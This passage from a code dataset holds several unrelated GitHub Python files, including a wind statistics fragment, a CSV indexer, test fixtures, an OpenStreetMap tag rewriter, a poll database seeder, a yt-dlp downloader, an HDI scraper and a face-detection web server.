the cases the strongest winds are {temp_ranges[5]}')\r\n print(\r\n f'In {round(((temp_range_values[6] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[6]}')\r\n print(\r\n f'In {round(((temp_range_values[7] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[7]}\\n')\r\n\r\n # Wind direction in the windiest days?\r\n # Temperature in the windiest days?\r\n # Wind peak gust compared to the windiest days and windiest direction?\r\n # Matrix:\r\n # wind speed - wind gust - wind direction - temperature (extremums for all values)\r\n # wind speed 23 543 65 234\r\n # wind gust .. ... .. ...\r\n # direction 54 ... 11 ...\r\n # temperature .. ... .. ...\r\n","repo_name":"kliment-radoev/Arch-AI","sub_path":"wind.py","file_name":"wind.py","file_ext":"py","file_size_in_byte":12292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34949659610","text":"import csv\n\n# Path to your original CSV file\ninput_csv_path = 'english_only_memes.csv'\n# Path to the new CSV file with index\noutput_csv_path = 'english_only_memes_indexed.csv'\n\n# Open the original CSV file and a new file to write to\nwith open(input_csv_path, mode='r', newline='', encoding='utf-8') as infile, \\\n open(output_csv_path, mode='w', newline='', encoding='utf-8') as outfile:\n \n # Create CSV reader and writer\n reader = csv.reader(infile)\n writer = csv.writer(outfile)\n\n # Read the header from the original file and write to the new file\n header = next(reader)\n # Add the 'index' field to the header\n header.append('index')\n writer.writerow(header)\n\n # Add an index to each row of the CSV\n for index, row in enumerate(reader):\n # Append the index to the current row\n row.append(str(index))\n # Write the row to the new file\n writer.writerow(row)\n\nprint(f\"Indexed CSV created at: {output_csv_path}\")\n","repo_name":"CSCI4100U/mobile-group-project-2023-straw-hats","sub_path":"final_project/lib/dbScripts/addIndex.py","file_name":"addIndex.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19295400985","text":"for i in range(10):\n print(i)\n\nprint(\"******************************\")\nfor i in 'Hola Mundo!':\n print(i)\n\nprint(\"******************************\")\ndef contador(n):\n c = 0\n for i in range(n):\n c += 1\n return c\n\nprint(contador(10))\n\nprint(\"******************************\")\ndef sumatoria(numeros):\n acum = 0\n for n in numeros:\n acum += n\n return print(acum)\n\nsumatoria([1,2,3,4,5])\n\nprint(\"******************************\")\ndef tabla_multiplicar(numero):\n \"Imprime la tabla de multiplicar\"\n for indice in [1,2,3,4,5,6,7,8,9,10]:\n print(f\"{numero} * {indice} = {numero * indice}\")\n \ntabla_multiplicar(2)","repo_name":"dkippes/Python-Practicas","sub_path":"Introduccion a Python/ciclo_for.py","file_name":"ciclo_for.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25399979387","text":"#!/usr/bin/env python3\nimport requests\nimport os\n\ndef imageUploader(image):\n \n # URL images will be posted to\n url= \"http://localhost/upload/\" \n \n # Open file as binary\n with open(image,\"rb\") as image:\n \n # Post image\n r= requests.post(url, files={\"file\":image})\n\nif __name__==\"__main__\":\n for file in 
os.listdir(\"/home/{}/supplier-data/images/\".format(os.environ.get('USER'))):\n \n # Split filenam and extension\n filename, fileExt = os.path.splitext(\"/home/{}/supplier-data/images/\".format(os.environ.get('USER'))+file)\n \n # Check if file is jpeg and upload it\n if fileExt == \".jpeg\":\n imageUploader(filename+fileExt)\n","repo_name":"AureliusAtilius/Automate-Updating-Catalog","sub_path":"supplier_image_upload.py","file_name":"supplier_image_upload.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72515233442","text":"# tests/__init__.py\n\nimport os\nimport unittest\nfrom app import create_app, db\n\nclass BaseTestCase(unittest.TestCase):\n def setUp(self):\n # Set up the test app\n self.app = create_app()\n self.app.config.from_pyfile('../config.py')\n self.client = self.app.test_client()\n\n # Set up the test database\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zombimann/distributed-legislative-system","sub_path":"user_service/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71794709282","text":"\nimport random\nimport numpy as np\n\ndef upscale_rnn(original_network, fraction_intrinsic, neuron_density=None,\\\n return_mask=False, intrinsic_sparsity=0.9, extrinsic_sparsity=0.2,\\\n allow_self_conns=True):\n \"\"\"\n This method was adapted from https://github.com/AlGoulas/bio2art.\n\n Generate scaled_network from a biological neural network (connectome).\n This operation allows the contruction of artiificial neural networks\n with recurrent matrices that obey the topology and weight strength\n contraints of a biological neural network.\n\n Input\n -----\n original_network: (N,N) ndarray\n If the network is directed, rows should represent source regions, and\n columns target regions.\n\n neuron_density: (N,) ndarray, default None\n N corresponds the number of brain regions in original_network.\n Each entry of neuron_density[i] denotes the number of neurons in region\n i. NOTE: if None (default) then one neuron will be assigned to each\n region will be assigned one.\n\n fraction_intrinsic: float (0 1]\n Percentage of the strength of the outgoing connections of a region to\n be used as the total strength of the intrinsic weights. 
If None, and\n self connections exist in original_network (i.e., the diagonal is\n different from zero), then self-connections are used as the total\n strength of the intrinsic weights.\n\n extrinsic_sparsity: float (0 1], default 0.2\n The percentage of all possible target neurons for each source neuron\n to form connections with.\n Note that at least 1 neuron will function as target in case that the\n resulting percentage is <1.\n This parameter can be used to make the sparisty of scaled_network vary\n around the density dictated by the actual biological connectomes.\n Note that this parameter is meaningful only if at least one region\n has more than 1 neuron, that is, for some i, neuron_density[i]>1.\n\n intrinsic_sparsity: float (0 1], default 1.\n Same as extrinsic_sparsity, but for the within-region/intrinsic\n connections.\n\n allow_self_conn: bool, default True\n Specify if the diagonal entries (denoting self-to-self neuron\n connections) should be kept of or not.\n\n Output\n ------\n original_network: ndrarray of shape (N,N)\n The actual biological neural network that was used, with no\n modificiations/scaling (see data_name for N)\n\n scaled_network: ndarray of shape (M,M)\n The rescaled neural network.\n (M is bound to the parameter neuron_density)\n\n region_neuron_ids: list of lists of int\n List of lists for tracking the neurons of the scaled_network network.\n region_neuron_ids[1] contains a list with integers that denote the\n neurons of region 1 in scaled_network as\n scaled_network[region_neuron_ids[1], region_neuron_ids[1]]\n\n \"\"\"\n # if neuron_density is not specified then populate each region with 1\n # neuron\n if neuron_density is None:\n neuron_density = np.ones((original_network.shape[0]), dtype=int)\n\n n_neurons = np.sum(neuron_density).astype(int) # total number of neurons\n\n if(neuron_density.shape[0] != original_network.shape[0]):\n print(f'Size of neuron_density must be equal to the number of brain \\\n regions in connectome:{original_network.shape[0]}')\n return\n\n # list of neuron ids per brain region\n sections = [np.sum(neuron_density[:i]).astype(int) for i in range(1, len(neuron_density))]\n neuron_ids_per_roi = np.split(np.arange(n_neurons), sections)\n\n # sum of outgoing weights for each region - used for calculation of\n # intrinsic and extrinsic weights\n out_strength = np.sum(original_network, axis=1)\n\n # initialize the neuron to neuron connectivity matrix\n scaled_network = np.zeros((n_neurons, n_neurons))\n\n if return_mask: mask = np.zeros((n_neurons, n_neurons)).astype(int)\n\n # start populating the neuron-toneuron connectivity matrix\n # by region\n for source_roi in range(original_network.shape[0]):\n\n # intrinsic connectivity\n source_neurons = neuron_ids_per_roi[source_roi]\n\n connected = False\n while not connected:\n intrinsic_conn = np.vstack([np.random.binomial(1, intrinsic_sparsity, len(source_neurons)) for _ in source_neurons]).astype(int)\n if np.sum(intrinsic_conn) > 0:\n connected = True\n\n if fraction_intrinsic is None and original_network[source_roi,source_roi] > 0:\n intrinsic_wei = original_network[source_roi,source_roi]/np.sum(intrinsic_conn)\n else:\n intrinsic_wei = (fraction_intrinsic*out_strength[source_roi])/np.sum(intrinsic_conn)\n scaled_network[np.ix_(source_neurons, source_neurons)] = intrinsic_conn * intrinsic_wei\n\n if return_mask: mask[np.ix_(source_neurons, source_neurons)] = 1\n\n # extrinsic connectivity\n target_rois = np.nonzero(original_network[source_roi,:] > 0)[0]\n for target_roi in 
target_rois:\n\n if target_roi != source_roi:\n target_neurons = neuron_ids_per_roi[target_roi]\n\n connected = False\n while not connected:\n extrinsic_conn = np.vstack([np.random.binomial(1, extrinsic_sparsity, len(target_neurons)) for _ in source_neurons])\n if np.sum(extrinsic_conn) > 0:\n connected = True\n\n extrinsic_wei = out_strength[source_roi]/np.sum(extrinsic_conn)\n scaled_network[np.ix_(source_neurons, target_neurons)] = extrinsic_conn * extrinsic_wei\n\n if return_mask: mask[np.ix_(source_neurons, target_neurons)] = 1\n\n # delete self-connections\n if not allow_self_conns: np.fill_diagonal(scaled_network, 0)\n\n if return_mask:\n return neuron_ids_per_roi, scaled_network, mask\n else:\n return neuron_ids_per_roi, scaled_network\n","repo_name":"estefanysuarez/rnns","sub_path":"rnns/connectivity.py","file_name":"connectivity.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22060234160","text":"class DbStatuses:\n wip: str = \"WIP\"\n init: str = \"INIT\"\n in_progress: str = \"IN PROGRESS\"\n pending_rev: str = \"PENDING-REVIEW\"\n tweak: str = \"TWEAK\"\n approved_internal: str = \"APPROVED_INT\"\n approved_client: str = \"APPROVED_CLIENT\"\n approved_temp: str = \"APPROVED_TEMP\"\n approved_tech: str = \"APPROVED_TECH\"\n\n def list_all(self):\n list_all_statuses = [self.wip,\n self.init,\n self.in_progress,\n self.pending_rev,\n self.tweak,\n self.approved_internal,\n self.approved_client,\n self.approved_temp,\n self.approved_tech]\n return list_all_statuses\n\nclass DbPubSlotsMethods:\n SLOTS_METHODS = {'m1': 'sf_csh',\n 'm2': 'mf_csh',\n 'm3': 'sf_geo',\n 'm4': 'geo_bake',\n 'm5': 'geo_sim',\n 'm6': 'scn_exp',\n 'm7': 'img_exp',\n 'm8': 'anm_crv',\n 'm9': 'scatter',\n 'm10': 'p_exp',\n 'm11': 'assign_exp',\n 'm12': 'cfg_scn_exp',\n 'm13': 'cfg_exp'}\n\nif __name__ == \"__main__\":\n cc = DbStatuses()\n print (str(cc.list_all()))","repo_name":"rarsith/ORIGIN_ENERVO","sub_path":"database/db_statuses.py","file_name":"db_statuses.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36437708437","text":"\"\"\"\nConverts a file from one format to another.\nThis example shows how to write objects to a file.\n\"\"\"\n\nimport osmium as o\nimport pdb\nimport sys\n\nclass TagRewrite(o.SimpleHandler):\n\n def __init__(self, writer):\n super(TagRewrite, self).__init__()\n self.writer = writer\n\n def node(self, n):\n self.writer.add_node(n)\n def way(self, o):\n self.writer.add_way(self.rewrite(o))\n def relation(self, o):\n self.writer.add_relation(self.rewrite(o))\n \n def rewrite(self, o):\n # if there are no tags we are done\n if not o.tags:\n return o\n \n # new tags should be kept in a list so that the order is preserved\n newtags = []\n \n # pyosmium is much faster writing an original osmium object than\n # a osmium.mutable.*. 
Therefore, keep track if the tags list was\n # actually changed.\n modified = False\n \n if 'area' in o.tags and o.tags['area'] == 'yes':\n # only write an empty set of tags\n modified = True\n elif 'ski' in o.tags and (o.tags['ski'] == 'no' or o.tags['ski'] == 'discouraged'):\n # only write an empty set of tags\n modified = True\n elif 'piste:type' in o.tags:\n if o.tags['piste:type'] not in (\"nordic\",\"downhill\",\"connection\" ,\"hike\",\"skitour\",\"sled\",\"ski_jump\",\"fatbike\",\"sleigh\" ,\"playground\",\"ski_jump_landing\",\"snow_park\"):\n newtags.append((\"piste:type\",\"other\"))\n modified = True\n else:\n newtags.append((\"piste:type\",o.tags['piste:type']))\n modified = True\n \n elif 'aerialway' in o.tags:\n if o.tags['aerialway'] not in (\"gondola\",\"chair_lift\",\"drag_lift\",\"platter\",\"t-bar\",\"magic_carpet\",\"rope_tow\",\"cable_car\",\"j-bar\",\"mixed_lift\"):\n newtags.append((\"aerialway\",\"other\"))\n modified = True\n else:\n newtags.append((\"aerialway\",o.tags['aerialway']))\n modified = True\n elif 'railway' in o.tags:\n if o.tags['railway'] in (\"funicular\",\"incline\"):\n newtags.append((\"aerialway\",\"other\"))\n modified = True\n else:\n # only write an empty set of tags\n modified = True\n \n if 'oneway' in o.tags and not 'highway' in o.tags:\n newtags.append((\"oneway\",o.tags['oneway']))\n modified = True\n \n if 'piste:oneway' in o.tags:\n newtags.append((\"oneway\",o.tags['piste:oneway']))\n newtags.append((\"piste:oneway\",o.tags['piste:oneway']))\n modified = True\n # handle access tag, only on ways\n # access handling of ways member of relations is not handled\n if 'ski' in o.tags and (o.tags['ski'] == 'no' or o.tags['ski'] == 'discouraged'): \n if 'piste:type' in o.tags and o.tags['piste:type'] in (\"nordic\",\"downhill\",\"skitour\",\"ski_jump_landing\",\"snow_park\"):\n return\n if 'foot' in o.tags and (o.tags['foot'] == 'no' or o.tags['foot'] == 'discouraged'): \n if 'piste:type' in o.tags and o.tags['piste:type'] in (\"connection\" ,\"hike\"):\n return\n if 'bicycle' in o.tags and (o.tags['bicycle'] == 'no' or o.tags['bicycle'] == 'discouraged'): \n if 'piste:type' in o.tags and o.tags['piste:type'] in (\"fatbike\" ):\n return\n \n if modified:\n # We have changed tags. 
Create a new object as a copy of the\n # original one with the tag list replaced.\n return o.replace(tags=newtags)\n else:\n # Nothing changed, so simply return the original object\n # and discard the tag list we just created.\n return o\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"Usage: python convert.py \")\n sys.exit(-1)\n\n writer = o.SimpleWriter(sys.argv[2])\n \n TagRewrite(writer).apply_file(sys.argv[1])\n\n writer.close()\n\n\n","repo_name":"yvecai/data-opensnowmap.org","sub_path":"tools/scripts/routing_tag_transform.py","file_name":"routing_tag_transform.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"18685981551","text":"import unittest\nimport json\n\n\nfrom app import create_app\nfrom app.models import db\n\nfrom app.models.user import User\nfrom app.models.category import Category\nfrom tests.config import (\n TEST_VALID_USER,\n TEST_VALID_EMAIL,\n TEST_VALID_PASSWORD,\n\n TEST_INVALID_USER,\n TEST_INVALID_EMAIL,\n TEST_INVALID_PASSWORD,\n TEST_VALID_CATEGORY_NAME,\n TEST_INVALID_CATEGORY_NAME\n)\n\nfrom flask_jwt_extended import (\n create_access_token,\n create_refresh_token\n)\n\n\nclass TestCategory(unittest.TestCase):\n def setUp(self):\n app = create_app()\n self.client = app.test_client()\n\n db.app = app\n\n db.session.remove()\n db.drop_all()\n db.create_all()\n\n self.user = User(fullname=TEST_VALID_USER,\n email=TEST_VALID_EMAIL,\n password=TEST_VALID_PASSWORD)\n db.session.add(self.user)\n db.session.commit()\n\n with app.test_request_context():\n self.tokens = {\n \"access_token\": create_access_token(identity=self.user.email),\n \"refresh_token\": create_refresh_token(identity=self.user.email)\n }\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def test_create_category(self):\n\n data = {\n \"label\": TEST_VALID_CATEGORY_NAME\n }\n\n access_token = self.tokens['access_token']\n response = self.client.post('/category',\n data=json.dumps(data),\n content_type='application/json',\n headers={\n 'Authorization': f'Bearer {access_token}'}\n )\n\n self.assertEqual(response.status_code, 201)\n\n def test_get_categories_with_categories(self):\n \"\"\"\n Not empty returned array\n \"\"\"\n\n data = {\n \"label\": TEST_VALID_CATEGORY_NAME\n }\n\n access_token = self.tokens['access_token']\n response = self.client.post('/category',\n data=json.dumps(data),\n content_type='application/json',\n headers={\n 'Authorization': f'Bearer {access_token}'}\n )\n\n get_request = self.client.get('/category',\n\n content_type='application/json',\n headers={\n 'Authorization': f'Bearer {access_token}'}\n )\n\n category_representation = [\n {'id': 1, 'label': 'Compras', 'name': 'compras', 'user_id': 1}]\n response_payload = json.loads(get_request.get_data())\n\n self.assertEqual(get_request.status_code, 200)\n self.assertEqual(category_representation, response_payload)\n","repo_name":"ondoheer/expensesAPI","sub_path":"tests/protected_endpoints/test_categories.py","file_name":"test_categories.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74479740322","text":"import os,sys,subprocess,datetime,time,re\n#\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n#\na = [line.strip() for line in open(os.path.join('/home','ubuntu','youtube.txt')).readlines()]\n#\nnow = 
datetime.datetime.fromtimestamp(time.time()).strftime(\"%m-%d-%Y_%H:%M:%S\")\n#\nfor b in a:\n if not 'channel' in b or '/c/' in b or 'user' in b:\n subprocess.call(f'yt-dlp --write-info-json --embed-subs --embed-thumbnail --recode-video mp4 -o \"/media/Dock1/Media/Videos/Dailies/{now}/%(upload_date)s - %(title)s/%(upload_date)s - %(title)s.%(ext)s\" {b}',shell=True)\n elif 'channel' in b or '/c/' in b or 'user' in b:\n try:\n channel = re.search('channel\\/(.*)',b).group(1)\n except:\n channel = re.search('\\/c\\/(.*)',b).group(1)\n except:\n channel = re.search('\\/user\\/(.*)',b).group(1)\n subprocess.call(f'yt-dlp --write-info-json --embed-subs --embed-thumbnail --recode-video mp4 --download-archive {channel}.txt {b} -o \"/media/Dock1/Media/Videos/Channels/{channel}/%(upload_date)s - %(title)s/%(upload_date)s - %(title)s.%(ext)s\"', shell=True)\n#\nwith open(os.path.join('/home','ubuntu','youtube.txt'),'w') as c:\n c.write('')","repo_name":"devmgardner/projects_misc","sub_path":"ytdl/dlp.py","file_name":"dlp.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30513889902","text":"# Ejercicio 4\n# Una institución educativa establece un apoyo económico para sus estudiantes, \n# basado en su desempeño académico y situación socioeconómica. \n# Si el estudiante tiene un promedio mayor a 3,5 y \n# pertenece al estrato 1, 2 o 3; es merecedor de una beca equivalente \n# al 100% de su matricula. \n# Elabore un script que, al digitar el promedio y el estrato del alumno, \n# defina si la persona merece o no el auxilio económico.\n\npromedio = float(input(\"\\nDigite el promédio académico: \"))\nestrato = int(input(\"Digite el estráto del alumno: \"))\n# if promedio > 3.5 and estrato <= 3:\nif promedio > 3.5 and estrato in (1,2,3):\n print(\"\\nEl alumno merece un auxilio educativo.\\n\")\nelse:\n print(\"\\nCreemos que el alumno no merece ser apoyado.\\n\")","repo_name":"djotalorab/MisionTIC2022","sub_path":"MisionTIC_Ciclo1_python/Sesion7/7_4.py","file_name":"7_4.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73622421282","text":"import os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom database import db\nfrom app import app\nfrom models.User import User\nfrom models.Poll import Poll\nfrom models.Vote import Vote\nfrom models.VoterList import VoterList\nfrom models.Answer import Answer\nimport datetime\n\nimport random\nimport names\nimport pandas as pd\n\nAGE_MAX = 100\nAGE_MIN = 18\nPOLL_RADIUS_MAX = 200\nPOLL_RADIUS_MIN = 150\n\ndef get_random_date(start, end, input_format, output_format):\n format = '%Y-%m-%d'\n stime = datetime.datetime.strptime(start, input_format)\n etime = datetime.datetime.strptime(end, input_format)\n td = etime - stime\n return (random.random() * td + stime).strftime(output_format)\n\ndef load_sample_values(filename):\n df = pd.read_csv(filename, delimiter=',')\n # remove nan values and return as dict\n return {df[column].name: [y for y in df[column] if not pd.isna(y)] for column in df}\n\ndef load_polls(filename):\n df = pd.read_csv(filename, delimiter=',')\n return df.groupby(['Poll', 'Category', 'Description']).apply(lambda s: s[['Answer']].to_dict(orient='records')).to_dict()\n\n\ndef create_user(email, LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX):\n user = User(email)\n user.gender = 
random.choice(sample_values['Gender'])\n user.first_name = names.get_first_name(gender = user.gender.lower())\n user.last_name = names.get_last_name()\n user.longitude = random.uniform(LONGITUDE_MIN, LONGITUDE_MAX)\n user.latitude = random.uniform(LATITUDE_MIN, LATITUDE_MAX)\n user.age = random.randint(AGE_MIN,AGE_MAX)\n user.ethnicity = random.choice(sample_values['Ethnicity'])\n user.industry = random.choice(sample_values['Industry'])\n user.religion = random.choice(sample_values['Religion'])\n user.income_range = random.choice(sample_values['Income range'])\n user.education = random.choice(sample_values['Education'])\n user.marital_status = random.choice(sample_values['Marital status'])\n user.veteran = random.random() < 0.01\n\n return user\n\ndef create_poll(email, name, category, description, LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX, REGION):\n poll = Poll(\n email,\n category,\n name,\n REGION,\n False,\n description,\n get_random_date('2020-01-01','2021-01-01','%Y-%m-%d', '%Y-%m-%d'),\n get_random_date('2021-01-02','2022-01-01','%Y-%m-%d', '%Y-%m-%d'),\n random.uniform(LONGITUDE_MIN, LONGITUDE_MAX),\n random.uniform(LATITUDE_MIN, LATITUDE_MAX),\n random.randint(POLL_RADIUS_MIN, POLL_RADIUS_MAX),\n True)\n\n return poll\n\n\ndef populate_database_with_coordinates(LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX, REGION):\n REGION_NAME = REGION.replace(' ', '').lower()\n\n with app.app_context():\n # create voters who will only vote on answers\n for v in range(0, 100):\n user = create_user(f'voter_{REGION_NAME}_{v}@email.com', LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX)\n db.session.add(user)\n db.session.commit()\n\n poll_count = 0\n for poll, answers in polls.items():\n # create user and poll owned by the user\n user = create_user(f'owner_{REGION_NAME}_{poll_count}@email.com', LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX)\n poll = create_poll(f'owner_{REGION_NAME}_{poll_count}@email.com', poll[0], poll[1], poll[2], LATITUDE_MIN, LATITUDE_MAX, LONGITUDE_MIN, LONGITUDE_MAX, REGION)\n\n poll_count += 1\n\n # 75% chance to have a non-expired poll\n if(random.random() < 0.75):\n poll.end_at = get_random_date('2023-01-01','2024-01-01','%Y-%m-%d', '%Y-%m-%d')\n\n db.session.add(poll)\n db.session.add(user)\n db.session.flush()\n\n # create answers\n answer_ids = []\n for answer_item in answers:\n answer = Answer(poll.id, answer_item['Answer'])\n db.session.add(answer)\n db.session.flush()\n answer_ids.append(answer.id)\n\n # for each answer_id, generate a random weighting\n weighting = []\n for j in answer_ids:\n weighting.append(random.random())\n\n # generate a list of answer_ids to vote on with a random length\n answer_ids_to_vote_on = random.choices(answer_ids, weights=weighting, k=random.randint(50,100))\n\n # vote with random number of voters with a random weighting\n voter_num = 0\n for answer_id in answer_ids_to_vote_on:\n vote = Vote(f'voter_{REGION_NAME}_{voter_num}@email.com', poll.id, answer_id)\n voter_num+=1\n db.session.add(vote)\n\n db.session.commit()\n\n# drop tables if exist\n# create all tables\nwith app.app_context():\n db.drop_all()\n db.create_all()\n\n# load sample values for each property from csv file\nsample_values = load_sample_values('tools/dbsamplevalues.csv')\npolls = load_polls('tools/polls.csv')\n\n# Sydney\npopulate_database_with_coordinates(-33.918015, -33.757231, 150.956441, 151.248958, 'Oceania')\n\n# London\npopulate_database_with_coordinates(51.380099, 51.575968, -0.276916, 0.046813, 'Europe')\n\n# 
Nairobi\npopulate_database_with_coordinates(-1.336352, -1.235159, 36.732246, 36.901376, 'Africa')\n\n# Sao Paolo\npopulate_database_with_coordinates(-23.633941, -23.448576, -46.754080, -46.497701, 'South America')\n\n# Singapore\npopulate_database_with_coordinates(1.309941, 1.412909, 103.76105, 103.897682, 'Asia')\n\n# Toronto\npopulate_database_with_coordinates(43.755408, 43.914581, -79.688323, -79.189666, 'North America')\n","repo_name":"alou64/mapocracy-api","sub_path":"tools/populate_db.py","file_name":"populate_db.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25833273822","text":"from collections import Counter\nimport re\nimport sys\n\nfile = open(sys.argv[1])\nstr = file.read()\nlist = re.split(\"[\\s.,;]+\", str)\ni = 0\nfor item in list:\n list[i] = item.lower()\n i+=1\nres = dict(Counter(list))\ni = 1\nfor key in sorted(res.keys()):\n print(i, key, \":\", res[key])\n i+=1\nfile.close()\n","repo_name":"olena-hul/DQE_HW","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40427957597","text":"import requests\nfrom BeautifulSoup import BeautifulSoup\nimport csv\nimport pandas as pd\n\nurl = 'http://hdr.undp.org/en/composite/HDI'\nresponse = requests.get(url) #headers not specified\nhtml = response.content\n\nsoup = BeautifulSoup(html)\ntable = soup.find('table', attrs = {\"width\" : 2268})\n\nrow_list = []\nfor row in table.findAll('tr'):\n\tcell_list = []\n\tfor cell in row.findAll('td'):\n\t\ttxt = cell.text.encode('utf-8')\n\t\tcell_list.append(txt)\n\trow_list.append(cell_list)\n\noutfile = open(\"./hdi.csv\", \"wb\") #wb - opened by writing in binary mode\nwriter = csv.writer(outfile, delimiter = ';')\nwriter.writerows(row_list)\nreader = csv.reader(outfile)#, delimiter = ';')\n\n# has to be done differently bc it's in a different format than salary.csv ?\ndf = pd.read_csv(\"./hqi.csv\", header = None, error_bad_lines = False, delimiter=';')\ndf.rename(columns = {0: 'idx', 1: 'Country', 2: 'Val1', 3: 'Val2'}, inplace = True)\ndf.sort_values(by = 'Val1', inplace = True, ascending = False)\n\n# the last thing - reset values of 'idx'\ndf.to_excel(\"sorted_hqi.xlsx\", index = False) #should it have the prof in the name?\n\n\n\n\n\n#print table.prettify()","repo_name":"mik0why/place-to-live","sub_path":"hdi-scraper.py","file_name":"hdi-scraper.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16477873529","text":"a=input(\"Enter a binary number: \")\nb=int(input(\"Enter 2nd number: \"))\ndef left_shift(a):\n return (a+\"0\")\ndef right_shift(a):\n s=a[:-1]\n return (\"0\"+s)\nch=int(input(\"Enter 0 for left shift and 1 for right shift: \"))\nif(ch==0):\n for i in range(0,b):\n a=left_shift(a)\nelse:\n for i in range(0,b):\n a=right_shift(a)\nprint(a)","repo_name":"yash1120/Cpp-learning","sub_path":"miss/shifting.py","file_name":"shifting.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25224962606","text":"import sys\n\nif len(sys.argv) == 1:\n print(sys.argv[0])\nelse:\n nome = sys.argv[1]\n arquivo = open(nome, \"r\")\n for linha in arquivo.readlines():\n print(linha[:-1])\n\n 
arquivo.close()","repo_name":"thalysonalexr/livro-progpython","sub_path":"cap-09/Exercicio-9-1.py","file_name":"Exercicio-9-1.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42629475112","text":"import argparse\nimport base64\nimport io\nimport importlib.util\nfrom pathlib import Path\nimport ssl\n\nimport cv2 as cv\nfrom jinja2 import Environment, FileSystemLoader\nimport numpy as np\nimport PIL.Image\nfrom starlette.applications import Starlette\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.responses import HTMLResponse, JSONResponse\nimport uvicorn\n\n\napp = Starlette()\napp.mount('/static', StaticFiles(directory='static'))\napp.g = {}\ntemplates_dir = str(Path.cwd()/'templates')\nenv = Environment(loader=FileSystemLoader(templates_dir), trim_blocks=True)\n\n\ndef get_global(name):\n return app.g[name]\n\n\ndef set_global(name, value):\n global app\n app.g[name] = value\n\n\n@app.route('/')\nasync def echo(request):\n template = env.get_template('index.html')\n return HTMLResponse(template.render(static_url='/static'))\n\n\n@app.route('/detect', methods=['POST'])\nasync def detect(request):\n data = await request.json()\n _, content = data['imgBase64'].split(',')\n decoded = base64.b64decode(content)\n image = read_from_bytes(decoded)\n faces, boxes = detect_faces(image)\n if not faces:\n return JSONResponse({'success': False, 'message': 'no faces detected'})\n model = get_global('model')\n predictions = model.predict(faces)\n points, error = convert_to_absolute(predictions, boxes)\n if error is not None:\n return JSONResponse({'success': False, 'message': error})\n return JSONResponse({'success': True, 'result': points})\n\n\ndef detect_faces(image):\n cascade = get_global('cascade')\n arr = np.asarray(image)\n gray = cv.cvtColor(arr, cv.COLOR_RGBA2GRAY)\n boxes = cascade.detectMultiScale(gray, 1.3, 5)\n faces = [read_from_bytes(gray[y:y+h, x:x+w]) for (x, y, w, h) in boxes]\n return faces, boxes\n\n\ndef convert_to_absolute(predictions, boxes):\n if len(predictions) != len(boxes):\n return None, 'number of predictions is not equal to number of boxes'\n n = len(predictions[0]) // 2\n rescaled = []\n for points, box in zip(predictions, boxes):\n x, y, w, h = box\n points[:n] = x + w*(points[:n] + 1)/2.\n points[n:] = y + h*(points[n:] + 1)/2.\n points = np.round(points).astype(int).tolist()\n box = box.astype(int).tolist()\n rescaled.append({'box': box, 'x': points[:n], 'y': points[n:]})\n return rescaled, None\n\n\ndef read_from_bytes(obj):\n if isinstance(obj, bytes):\n image = PIL.Image.open(io.BytesIO(obj))\n elif isinstance(obj, np.ndarray):\n image = PIL.Image.fromarray(obj)\n else:\n raise TypeError(f'unexpected image type: {type(obj)}')\n return image\n\n\ndef serve():\n 